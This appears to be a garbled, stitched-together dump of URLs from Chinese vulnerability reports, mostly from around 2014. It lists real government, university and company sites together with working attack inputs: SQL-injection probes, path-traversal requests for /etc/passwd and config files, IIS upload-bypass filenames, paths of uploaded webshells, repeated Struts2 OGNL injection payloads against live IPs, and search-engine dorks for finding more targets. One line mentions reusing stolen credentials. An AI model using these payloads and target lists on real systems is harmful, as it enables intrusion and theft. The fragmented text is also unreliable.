http://www.url.com/xw_view.asp?id=xxx页面存在注入。部分网站是以http://www.url.com/xw_view.asp?id=xxx&xxxxxxxx的形式存在,只需将&xxxx删去即可注入。由于该建站系统不开源(收费还这么不负责),没有漏洞源码,但在谷歌,度娘 inurl:xw_view.asp?id= http://www.chuge8.com/ http://asxb.ashd.gov.cn/showxphoto.asp?action=login http://wapha.189.cn/wap_color/login/login.jsp http://byj.tcl.com/Graduation/GetWorksJson?highType=3&BestOrNewType=new&School=135791&&Name=1357919988 http://202.119.189.248/pyxx/login.aspx url:http://mitv.tcl.com/DRP/register/saveRegisterInfo?emailType=@tcl.com&userRegisterInfo.gender=M&userRegisterInfo.password=admin&userRegisterInfo.currentPassword=admin&userRegisterInfo.firstName=admin&userRegisterInfo.lastName=admin&userRegisterInfo.userLoginId=admin9988 http://voice.tcl.com/protected/config/.svn/entries http://www.csc.edu.cn/laihua/programsearch.aspx?academicDegreLevel=&teachingLanguage=&durationOfStudy=&chineseProficiencyRequire=&tuitionFees=&enrollmentDate=&scholarshipTpye=&programName= jsp:directive.page jsp:directive.page http://chat.uzai.com/ http://oa.bamatea.com http://oa.moonbasa.com http://oa.etonetech.com http://oa.ztcz.cn http://218.249.130.74 http://119.146.190.170:9988 http://zhidao.baidu.com http://wenku.baidu.com http://223.4.22.36 http://222.243.160.83:9090 http://www.chipshow.cn http://116.205.96.170:9090 http://www.sxjbjt.com:9090 http://122.225.203.168:8888 http://oa.chinabed.com http://oa.lutongnet.com http://oa.zetacn.com:9090 http://oa.zhcpt.edu.cn http://www.doc88.com http://oa.sinodata.com.cn http://www.docin.com http://www.koyochem.com:8080 http://61.186.155.27 http://oa.nyinn.cn http://115.236.65.115:9090 http://119.146.190.118:8089 http://219.137.250.133 http://123.133.29.174:9090 http://koa.ecp888.com http://www.cting.com.cn http://oa.suncorps.cn http://59.41.47.211 http://oa.bamatea.com:9090 http://oa.zhenaiws.com http://www.koyochem.com:9191 http://60.208.131.46:9090 http://219.131.221.174:9090 http://oa.bnuz.edu.cn:8080 http://183.238.59.61:9090 http://218.205.208.22:9090 
http://oa.xhlbdc.com http://124.193.165.174:9090 http://218.75.87.186:9090 http://oa.eva-group.com:511 http://113.106.92.16:9090 http://oa.cqmsy.com http://cting.com.cn http://220.231.158.211 http://oa.tiholding.cn http://124.172.170.141:9090 http://oa.hengdigroup.com:9090 http://www1.elkay.com.cn:9090 http://www.gzpiano.com http://oa.zaffer.cn http://oa.gdisg.com http://219.129.189.12/ http://www.goldmail.cn/about/hotspot/hotspot_detail.php?ID=168 http://www.zerom.cn/ http://www.saregroup.cn/Project/detail/id/12'.html http://www.xiaheng.net/ URL:http://60.166.52.108:1010/ahcc/login.aspx http://www.gxnun.net/1.asp http://www.gxnun.net/45nnsztw/new/ADMIN/indox.asp http://www.yongche.com/user/add_contact.php?user_contact_id=100001 http://www.goldmail.cn/search.php?keyword=1 http://wjj.haimen.gov.cn/ http://wjj.haimen.gov.cn/view.asp?keyno=886 http://wjj.haimen.gov.cn/view.asp?keyno=886 http://wjj.haimen.gov.cn/hmwj_ggfw.asp?keyno=622%20and%201=1 http://wjj.haimen.gov.cn/view.asp?keyno=991%20and%201=2 http://hmgxq.haimen.gov.cn/view.asp?keyno=2389%20and%201=2 http://www.hmrd.gov.cn/view.asp?keyno=11747%20and%202388=2388 http://dz.haimen.gov.cn/view.asp?keyno=2365%20and%201=2 http://zgh.haimen.gov.cn/view.asp?keyno=3461%20and%201=2 http://clz.haimen.gov.cn/view.asp?keyno=2311%20and%201=2 http://women.haimen.gov.cn/view.asp?keyno=4177%20and%201=2 http://hbsz.e21.cn/login.php a.jpg/a.asp;a.jpg等不会被拦截。 a.jpg/a.asp;a.jpg等会被拦截。 http://localhost/pic.asp;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg http://localhost/屯屯.asp;.jpg http://localhost/pic.asp;屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯.jpg http://d.longtugame.com/k520?user_id=12857617 
http://torder.chanjet.com/Login_Order_NEW.aspx url:http://jsjy.hfjy.net.cn/hbadmin/Welcome.asp url:http://jsjy.hfjy.net.cn/UpFile/2014810212451.asp http://wordpress.org/news/2014/08/wordpress-3-9-2/ https://www.drupal.org/SA-CORE-2014-004 http://demo.zoomla.cn/Admin/i/Shop/OrderList.aspx?Province=&city= http://demo.zoomla.cn/Admin/I/Shop/Orderlistinfo.aspx?id=9 http://demo.zoomla.cn/Admin/I/Content/ShowContent.aspx?GID=43&modeid=19 http://demo.zoomla.cn/Admin/Template/LabelManage.aspx http://demo.zoomla.cn/Admin/Content/NodeManage.aspx http://demo.zoomla.cn/Admin/User/AdminManage.aspx http://demo.zoomla.cn/Admin/User/AddManage.aspx ip:42.96.185.111 http://42.96.185.111:9200/index http://q.letv.com/question/1925页面,还有http://q.letv.com/article/269同样存在存储型xss,在该页面评论,如图 http://q.letv.com/article/269 http://q.letv.com/article/268页面同样存在存储型xss http://q.letv.com/article/267页面同样存在存储型xss http://q.letv.com/article/268依次变量268这个数字就可以了 site:cgbchina.com.cn filetype:jsp https://shop.cgbchina.com.cn/CgbMall/jsp/brandQuery.jsp?gid=131&goods_price=中有个gid参数,用1=1尝试一下,结果返回,变量类型错误,看来没法注入了 https://shop.cgbchina.com.cn/BusinessCityWeb/ecity.do?func=queryClassFun&dom= http://xsser.l1n3.net/WY6NN2?1407683427 http://127.0.0.1/admin/huiyuandetail.asp?id=831 http://www.hr135.com/ask/index.php http://www.hr135.com/ask/index.php?c=content&id=162 http://www.tipask.com/ http://user.ci123.com/account/ManageAccount http://www.neverwinterol.com.cn/《无冬0L》Xbox官方站点存在struts2安全漏洞 http://bbs.173.com/forum.php http://pc.mmb.cn http://pc.mmb.cn/wap/pc/user/login.jsp http://www.sonkwo.com/users/171785 http://webcache.googleusercontent.com/search?q=cache:GnX3VCP1vS8J:ftp://58.52.195.203/%25D0%25C5%25CF%25A2%25D6%25D0%25D0%25C4/%25D0%25C5%25CF%25A2%25D6%25D0%25D0%25C4%25CD%25F8%25C2%25E7%25C9%25E8%25B1%25B8%25D7%25CA%25C1%25CF%25BC%25B0%25C1%25AA%25CF%25B5%25B5%25E7%25BB%25B0.doc+&cd=168&hl=zh-CN&ct=clnk&gl=cn&lr=lang_zh-CN%7Clang_zh-TW FTP://10.46.1.201无开机密码, http://www.dyzw.gov.cn/newsshow.asp?id=1739 
http://top.shenchuang.com/index.asp?pushid=420678 http://system.denachina.com/mobage_oa/ http://system.denachina.com/mobage_oa/index.php/user/absence_info/6653 http://jsjy.hebtu.edu.cn/showclass.asp?classid=8 http://xsc.hebtu.edu.cn/list.php?class=0 http://io.hebtu.edu.cn:8080/newsite/list_detail.php?clevel=11 http://hb.zjnu.edu.cn/search.asp http://www.wooyun.org/searchbug.php intitle:FE协作办公平台 http://www.hebmu.edu.cn/user/reg.aspx?TypeId=1 http://www.hebmu.edu.cn/user/reg.aspx?TypeId=1 1.asp/201408/20140811121344106111.jpg http://daq.cn/?fr=67001,与买卖宝是同一家,试试刚才偷来的买卖宝的帐号test123,密码:123456 http://www.whfzb.gov.cn/site/frontpage/webApply/login.action http://cstc.lib.stu.edu.cn/ http://cstc.lib.stu.edu.cn/Articleview.asp?ArticleID=10039 http://cstc.lib.stu.edu.cn/Articleview.asp?ArticleID=10039%27 http://cstc.lib.stu.edu.cn/Articleview.asp http://cstc.lib.stu.edu.cn/Articleview.asp http://struts.apache.org/release/2.3.x/docs/s2-019.html http://www.boyaa.com.hk/s/ir_circular.php?year=2014 http://www.boyaa.com.hk/s/media.php?year=2014 http://www.boyaa.com.hk/s/ir_present.php?year=2014 http://www.chukong.com/ http://www.chinastarch.com.hk/ http://www.boyaa.com.hk/ http://www.todayir.com/ http://www.xhnmedia.com.hk http://project.todayir.com/ http://www.mediachina-corp.com/ http://i.178.com/~blog.index.index/ http://news.usst.edu.cn/login.asp?id=1 http://drops.wooyun.org/papers/548 http://124.74.70.126:8080/login.do http://www.quyou.com/login/index.aspx http://www.xinnet.com/user/user.do?method=toFindPwd http://nerc.edu.cn/FrontEnd/default.html http://www.rsc.sdu.edu.cn/2010new2/boshihou/index.php?owner=8 http://www.gbpx.sdu.edu.cn/theme/standard/gaoxiao32/main_more.html?type=0 http://www.gbpx.sdu.edu.cn/theme/standard/gaoxiao32/main.html?subjectid=40 http://home.focus.cn/group/group_forum.php http://report.uzai.com/File/db.txt http://wap.ha.10086.cn/login.action inurl:catalog.jsp?flag inurl:FAQView.jsp inurl:newsdetails.jsp?type= 
http://www.qhdzw.gov.cn/details/newsdetails.jsp?type=InfoTPXW&infoid=2031 http://www.xsxzfwzx.gov.cn/details/newsdetails.jsp?type=InfoTPXW&infoid=00000693 http://211.141.115.19/details/newsdetails.jsp?type=InfoTPXW&infoid=00000332 http://61.180.86.32:8008/details/newsdetails.jsp?type=InfoZWGK&infoid=313 http://117.40.186.185:8008/outportal/details/newsdetails.jsp?type=InfoTPXW&infoid=309 http://117.40.239.74/outportal/details/newsdetails.jsp?type=InfoTPXW&infoid=00000450 http://61.180.72.3/details/newsdetails.jsp?type=InfoZXDT&infoid=301 http://117.40.187.175:8008/outportal/details/newsdetails.jsp?type=InfoTPXW&infoid=00000351 http://60.170.27.13/news_details.jsp?type=InfoGZYW&infoid=3207 http://218.65.59.94/outportal/details/newsdetails.jsp?type=InfoTPXW&infoid=00000319 http://xzfw.nc.gov.cn/details/newsdetails.jsp?type=InfoTPXW&infoid=00001131 http://www.bbxzfw.gov.cn/news_details.jsp?type=InfoGZYW&infoid=3199 http://222.133.56.86:8080/ecgapout/details/newsdetails.jsp?type=InfoTPXW&infoid=00000441 http://117.43.10.254:8008/outportal/details/newsdetails.jsp?type=InfoXXGG&infoid=319 http://117.40.239.74/outportal/details/newsdetails.jsp?type=InfoTPXW&infoid=313 http://www.syspfw.com/details/newsdetails.jsp?type=InfoTPXW&infoid=00000363 http://120.203.196.125/details/newsdetails.jsp?type=InfoTPXW&infoid=00000321 http://wssp.lepingshi.gov.cn/outportal/details/newsdetails.jsp?type=InfoTPXW&infoid=00000425 http://wssp.jdz.gov.cn/outportal/details/newsdetails.jsp?type=InfoTPXW&infoid=00000720 http://www.jxtgxzfw.gov.cn/outportal/details/newsdetails.jsp?type=InfoTPXW&infoid=00000630 http://xzsp.poyang.gov.cn/outportal/details/newsdetails.jsp?type=InfoTPXW&infoid=00001677 http://seller.cctvmall.com/cshop/manage/login font-size:99px;position left:0;right:0;background width:100%;padding http://www.oschina.net/code/snippet_865087_37950 inurl:include/content.php?id= http://www.xxx.gov.cn/include/video.php?id=4 http://www.xxx.gov.cn/include/content.php?id=3289 
http://www.xceda.gov.cn/include/content.php?id=3289 http://www.sqlmap.org www.xceda.gov.cn\session http://rsc.fzu.edu.cn/listzp.php?id=224 http://cjy.fzu.edu.cn/zkb/zkluntan/forum.asp?forum_id=1 http://zsd.fzu.edu.cn/viewnews.asp?id=796 http://iamc.fzu.edu.cn/column.php?pid=12 http://iamc.fzu.edu.cn/article.php?aid=385 http://jwjc.hue.edu.cn/index.php?action=show&id=150 http://dlgl.sipo.gov.cn/freeze.main?filePath=../../../../../../../../../../etc/passwd&txn-code=ImgOutServlet&type=agent,可读取相关文件信息: appmfl.com/?informationshow/tp/211/id/15.html http://www.bjndlz.gov.cn/level2.jsp?caid=002 http://www.deitui.com/index.php?m=html&a=down http://www.studyinlnu.com/xx_list.asp?bid=39 http://218.7.13.214:82/admin/upload.asp http://218.7.13.214:82/Upload/lan.asp;20147261723969379.jpg http://218.7.13.214:82/Upload/milu.asp;.jpg20148112139252821.jpg inurl:inurl:zsdt.asp?class_ID= https://www.google.com.hk/?gfe_rd=cr&ei=IcHoU6PuFoqK8QewmIHYDA&gws_rd=ssl#newwindow=1&q=inurl:zsdt.asp%3Fclass_ID%3D&safe=strict http://www.issence.com/ http://www.cqbbsourcing.gov.cn/download.php?file=./../includes/config_inc.php http://yxxf.swu.edu.cn/download.php?file=./../includes/config_inc.php http://www.cqljjr.com/download.php?file=./../includes/config_inc.php http://www.cqxiaoma.com/download.php?file=./../includes/config_inc.php http://pharmacy.swu.edu.cn/download.php?file=./../includes/config_inc.php http://www.cqjbso.gov.cn/download.php?file=./../includes/download.php http://www.fctl.com.cn/download.php?file=./../includes/config_inc.php inurl:zcfg_read.asp?id= http://209.116.186.246/#newwindow=1&q=inurl:zcfg_read.asp%3Fid%3D&start=0 http://60.8.102.174/zcfg_read.asp?id=2433 http://www.hyxzfw.gov.cn/new_read.asp?id=3296 http://www.wyxzfw.com/zcfg_read.asp?id=4028 http://www.xlinfo.gov.cn/zcfg_read.asp?ID=23 http://www.ccxzwzx.gov.cn/zcfg_read.asp?id=29280 http://www.gzshebao.org/zcfg_read.asp?id=2105 http://www.jshuaqiao.com/new_read.asp?id=2652 http://www.esensoft.com.cn/ 
inurl:grpslogin.jsp http://219.135.157.142:9000/irpt/i/oem/grpslogin.jsp http://zdsy.cq-l-tax.gov.cn/oem/grpslogin.jsp http://218.94.69.69:7003/irpt/i/oem/suzhouds/ssl/grpslogin.jsp?taskGroup=ZDSY2014 http://www.szltax.gov.cn:7101/i/oem/suzhouds/ssl/grpslogin.jsp?taskGroup=2014NZDSYJKYBB_SJ_ http://tongji.chinatally.com:8080/irpt/oem/grpslogin.jsp https://web1.nb-n-tax.gov.cn:7006/sszl/i/oem/grpslogin.jsp http://61.132.47.120:8090/oem/grpslogin.jsp http://218.92.100.83:7010/oem/grpslogin.jsp http://110.249.221.9:9000/i/oem/grpslogin.jsp http://218.5.65.189/oem/grpslogin.jsp http://tj.hecom.gov.cn/oem/grpslogin.jsp http://221.229.123.251:7001/i/oem/grpslogin.jsp http://218.28.24.36:9999/i/oem/grpslogin.jsp http://61.133.94.3:8001/oem/grpslogin.jsp http://218.93.18.190:8080/irpt/i/oem/grpslogin.jsp http://www.li-ning.com.cn/uploadfile/07029/2014072945099.html http://fx.sx.189.cn/sousuo.do?action=lhss http://www.2cto.com/Article/201103/85391.html http://note.youdao.com/yws/mapi/bindemail?method=sendadd&email=攻击者邮箱地址 cn:9090 http://x.x.x.x/uploadfile?istrade=istrade&filename=../WEB-INF/web.xml http://x.x.x.x//uploadfile?istrade=istrade&filename=../../../../../etc/passwd http://im.dhzq.com.cn:9090/uploadfile?istrade=istrade&filename=../WEB-INF/web.xml http://im.dhzq.com.cn:9090/uploadfile?istrade=istrade&filename=../../../../../etc/passwd inurl:readnews.php?class= http://jsjdj.wuhai.gov.cn/readnews.php?class=%D6%CA%BC%E0%D0%C5%CF%A2&id=945 http://www.whsfxzw.gov.cn/readnews.php?class=%B1%EA%CC%E2%C0%B8&id=1354 http://zgh.wuhai.gov.cn/readnews.php?class=%B1%EA%CC%E2%C0%B8&subclass=%D5%FE%B2%DF%B7%A8%B9%E6&id=585 http://www.nmwhrd.gov.cn/readnews.php?class=一府两院&subclass=重要文件&id=695 http://www.whyz.gov.cn/readnews.php?class=%D0%C2%CE%C5%B7%FE%CE%F1&subclass=%D4%CB%B9%DC%B6%AF%CC%AC&id=190 http://ajj.wuhai.gov.cn/readnews.php?class=应急预案&subclass=应急预案&id=90 http://zsj.wuhai.gov.cn/readnews.php?class=%D5%D0%C9%CC%B6%AF%CC%AC&subclass=%D5%D0%C9%CC%B6%AF%CC%AC&id=797 
http://218.28.193.146:15000/jmx-console/ http://218.28.193.146:15000/web-console/ http://218.28.193.146:15000/jmx-console/ http://218.28.193.146:15000/web-console/ inurl:/news/newsmore.aspx?lid= http://www.xjjtsg.com/news/NewsMore.aspx?lid=81 http://www.sqlmap.org http://home.sdchina.com/search.aspx?keystr= inurl:SPEVideoPage.aspx?KindSetID= inurl:SPENewsList.aspx?KindSetID= http://www.azxx.net/dpma/FWeb/SPEWeb/Web/SPENewsList.aspx?KindSetID=1000001&sid=305001 http://www.azxx.net/dpma/FWeb/SPEWeb/Web/SPEVideoPage.aspx?KindSetID=30 http://www.whwzyx.net/dpma/FWeb/WorkRoomWeb/Web/Index.aspx?TID=31800100 http://www.sqlmap.org http://www.phpweb.org/webmall/detail.php?id=%27+1+%27 http://www.ybc.org.cn/news/subspecialnews.jsp?specialid=40&positions=14 http://sd.119.gov.cn/xiaofang/ http://sd.119.gov.cn/console http://59.75.129.109/newslist.aspx?titleSearch=%E4%BF%A1%E6%81%AF%E5%AD%A6%E9%99%A2 http://oa.huedu.net/EduOA/default.asp www.xxx.com/W_admin/ http://www.shviki.cn/w_admin/ http://www.jafisure.com/w_admin/ http://www.xitang100.cc/w_admin/ http://www.hnzhongxinhe.com/w_admin/ http://www.jafisure.com/w_admin/ http://www.happyhouse.cn/w_admin/ http://www.ligao365.cn/w_admin/ http://www.xinlongjs.com.cn/w_admin/ http://www.mlfs.cc/W_admin/ http://www.wulinbaby.com/w_admin/ http://www.yiqianls.com/w_admin/ http://www.cesafety.cn/login.action?website=gzsep http://ptcms.csdn.net/article/service/article_count?preview=1&aid=2821007 http://yp.oss.org.cn/software/show_cat.php?cat_id=17 http://lbs.189.cn/dianping http://lbs.189.cn/dianping/coupon.php?act=detail&id=782 http://sdst.zjnu.edu.cn/ sdst.zjnu.edu.cn/search.asp?imageField2.x=5&imageField2.y=7&keywords=1 www.cqupt.edu.cn/cqupt/List.jsp?Type=news http://www.cqupt.edu.cn/login.jsp http://demo.easethink.com/t1/index.php IP:182.92.163.204 htpp://oa.kjkd.com/BusinessFrm/ http://oa.kjkd.com/BusinessFrm/FileDowdLoadWFM.aspx?filePath=../web.config&fileName=../web.config http://bbs.bccn.net/zzz/bzml/view.php?fid=* 
http://bbs.bccn.net/zzz/bzml/view.php?fid=* http://www.17500.cn/p3/p3detail.php?i=2014193 http://baidu.csdn.net/rec.html?title=2&url=http://developer.baidu.com/wiki/index.php?title=docs/pcs google:inurl:/webschool/BBS shell:http://www.ir.zju.edu.cn/web/up_file/201309/137894906040.php https://github.com/kurui/TPP/tree/master/defaultroot/WEB-INF https://github.com/kurui/TPP/blob/master/defaultroot/WEB-INF/applicationContext-base.xml jdbc:oracle:thin:@172.18.42.65:1521:sqpt jdbc:oracle:thin:@202.104.150.234:1521:orcl jdbc:oracle:thin:@192.168.1.226:1521:orcl jdbc:oracle:thin:@192.168.150.1:1521:orcl intitle:FE协作办公平台 http://www.gzcdc.org.cn/education/ajax.Aspx?act=submitTel&tel=* http://www.gzcdc.org.cn/education/ajax.Aspx?act=submitTel&tel=* http://zhaopin.longtugame.com/html/90sec.php http://mili.umiwi.com/huodong/leimingquest?uid=6025033&n=3 http://m.58.com/cs/cwzengsong/18047282901898x.shtml?refrom=wap http://blog.qiniu.com https://github.com/ronalfei/mailbus/blob/master/src/mailbus_smtp_client.erl https://47922a86f536d9b5.box.lenovo.com/user/signin或直接访问https://box.lenovo.com/user/signin inurl:ahsffyww/ZXDefault2.action inurl:ahsffyww/fjck.action inurl:ahsffyww/wssq.action inurl:/ahsffyww/wszx.action inurl://ahsffyww/wsts.action http://61.191.213.82:1980/ahsffyww/ZXDefault2.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D 
http://60.173.113.172:1980/ahsffyww/ZXDefault2.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://218.22.93.234:1980/ahsffyww/ZXDefault2.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://218.23.185.20:1980/ahsffyww/ZXDefault2.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://60.172.0.38:1980/ahsffyww/ZXDefault2.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D 
http://220.180.184.66:1980/ahsffyww/ZXDefault2.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D inurl:/childcatalog/zxzxinfo.jsp?MailId= http://www.ahn4a.cn/main/model/childcatalog/zxzxinfo.jsp?MailId=49 http://www.sqlmap.org www.ahn4a.cn\session url:http://www.chinapanda.org.cn/gallery.php?id=140 http://www.czp.gov.cn/site/model/search.aspx?keyword=a http://www.cczdrc.gov.cn/Site/model/search.aspx?keyword=a&imageField.x=34&imageField.y=15 http://www.czkjllt.com/kczx/model/search.aspx?keyword=a http://www.czzwgk.gov.cn/web/searchResult.aspx?unit=&key=a%27%20and%201=1&scope=%E6%A0%87%E9%A2%98&begin_date_b=2013/8/13&end_date_b=2014/8/13&xxfl_id=&flagsimple= http://www.czsipo.gov.cn/Site/model/search.aspx?keyword=a http://www.czjrfw.com/List.aspx?kind=seach&keyword=a inurl:/comment_info.jsp?sslm= inurl:subject_info.jsp?up_lmbh= http://www.sxtsaj.com/comment_info.jsp?sslm=00205&xxbh=999999999 http://www.sqlmap.org inurl:company.php?cat_pid= inurl:honor.php?cat_id= inurl:video.php?cat_pid= inurl:event.php?cat_pid= inurl:media.php?cat_pid= inurl:research.php?cat_pid= http://www.anhuixinke.com/honor.php?cat_pid=2&cat_id=14&cat_flage=0 http://www.sqlmap.org www.anhuixinke.com\session http://scdm.cdu.edu.cn/zxzx.php?newsid=1048 inurl:/appellate/appellate.do inurl:tslb= http://www.hz12345.gov.cn/appellate/appellate.do?act=query&page=10&tslb http://www.sqlmap.org www.hz12345.gov.cn\session www.kuntairoyalhotel.com/saas/Cms/getInteraction/?client_account=bj_ktjh http://www.gzkfqjcy.gov.cn/siteserver/siteserver/CMS/console_tableMetadata.aspx?ENName=cms_Content&TableType=BackgroundContent 
http://www.gzkfqjcy.gov.cn/siteserver/siteserver/main.aspx http://www.gzkfqjcy.gov.cn/T_newss.aspx http://zp.xyzx5u.com/ http://zp.xyzx5u.com/Manager/login.aspx www.yaofang.cn了 http://sz.ahedu.gov.cn/ inurl:searchAll.action inurl:hbwz/wcms http://www.xf12333.cn/hbwz/wcms/searchAll.action?searchContent=a http://www.hbxgxc12333.gov.cn/hbwz/wcms/searchAll.action?_currpage=4&_pagelines=20&_rowcount=461 http://ss12333.com/hbwz/wcms/searchAll.action?_currpage=7&_pagelines=20&_rowcount=276 http://www.hbsyrss.gov.cn/hbwz/wcms/searchAll.action http://www.hb12333.com/hbwz/wcms/searchAll.action?COLLCC=2196715525&COLLCC=2347710469&_currpage=33&_pagelines=20&_rowcount=1640 http://www.hb.hrss.gov.cn/hbwz/wcms/searchAll.action http://hbxgal12333.gov.cn/hbwz/wcms/searchAll.action?_currpage=6&_pagelines=20&_rowcount=271 http://alrs.xicp.net/hbwz/wcms/searchAll.action http://www.ouyahuanyu.com/zhxx_list.asp?id=92 http://www.sxhdct.com/fuwu_list.asp?id=65 http://www.shanghaizhongmin.com/news_list.asp?id=58 http://www.dgsytz.com/fuwu_list.asp?id=55 http://www.whjcrh.com/fuwu_list.asp?id=56 http://www.sywssp.com/news_list.asp?id=54 http://www.sz-zdy.com/news_list.asp?id=57 http://www.njxietong.com/news_list.asp?id=59 http://www.ahxyqz.com/news_list.asp?id=66 http://www.jxrsq.com/news_list.asp?id=55 http://www.fjbjxy.com/news_list.asp?id=74 http://www.fjbjxy.com/news_list.asp?id=74 http://www.sdkunde.com/fuwu_list.asp?id=64 http://www.fs-guancheng.com/fuwu_list.asp?id=55 http://www.nbtfyy.com/fuwu_list.asp?id=59 http://www.sdbrg.com/fuwu_list.asp?id=69 http://www.slcxkj.com/fuwu_list.asp?id=59 http://www.cqydfl.net/rc_list.asp?id=4 http://www.tianyuemotor.com/news_list.asp?id=68 http://www.jinfenganxin.com/news_list.asp?id=74 http://www.bjfxnt.com/news_list.asp?id=57 http://www.jstzjf.com/news_list.asp?id=32 http://www.jymyms.com/news_list.asp?id=57 http://www.szhmsl.com/news_list.asp?id=58 http://www.jjhainiu.com/news_list.asp?id=57 http://www.dgytblg.com/news_list.asp?id=73 
http://www.chuduhengkang.com/news_list.asp?id=32 http://www.zhonghuajiaji.com/new_list.asp?id=54 http://www.fjtlly.com/news_list.asp?id=73 http://www.jshdhn.com/news_list.asp?id=74 http://www.zzxyy8.com/news_list.asp?id=74 http://www.wandashiyou.com/news_list.asp?id=99 http://www.tjhrl.com/news_list.asp?id=69 http://www.scysjs.com/news_list.asp?id=32 http://www.shxzbz.com/news_list.asp?id=70 http://www.szhdmc.com/news_list.asp?id=55 http://www.szcszlkt.com/news_list.asp?id=55 http://jjytrade.com/news_list.asp?id=72 http://www.jyhongfa.com/news_list.asp?id=69 http://www.nckcxx.com/new_list.asp?id=86 http://www.yyjszj.com/fuwu_list.asp?id=66 jsp:directive.page jsp:directive.page jsp:directive.page jsp:directive.page jsp:directive.page jsp:directive.page jsp:directive.page jsp:directive.page jsp:directive.page http://www.chinapnr.com/ http://www.chinapnr.com/.svn/entries http://v.youmi.cn/member/delNote/?id=1123 www.scycjy.gov.cn http://www.scycjy.gov.cn/upload_file/%E6%96%B0%E5%BB%BA%E6%96%87%E4%BB%B6%E5%A4%B9%E8%88%B9%E5%9D%9A%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F/bakk/wwwroot/count/ipdata/ http://academy.yonyou.com/ http://academy.yonyou.com/News_1.aspx?newsid=58 http://academy.yonyou.com/News_1.aspx?newsid=58 http://academy.yonyou.com/News_1.aspx?newsid=58 http://see1.tongji.edu.cn/system/ http://dadm.imust.cn/manage/login.aspx http://alumni.imust.cn/manage/login.aspx http://x.x.x.x/seatListSelect.jsp http://x.x.x.x/ucstarMessage-list-new.jsp http://x.x.x.x/webcall/messageNoteAdd.jsp http://x.x.x.x/client-editAffiche.action http://x.x.x.x/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://180.169.69.174/ http://www.jluhp.edu.cn/Art_Show.php?id=562” inurl:Channel.Aspx?ChannelID= http://item.yhd.com/item/2243856 www.alipay.com,解释:注册阿里云邮箱后同时自动注册了支付宝,此漏洞便通过支付宝来实现。 http://www.konkamobile.com/Search.aspx?key=a http://www.kkcool.com/kkmobile/Graphics.asp?picstype_2=0103 http://www.kkcool.com/kkmobile/Graphics.asp?supportid=a 
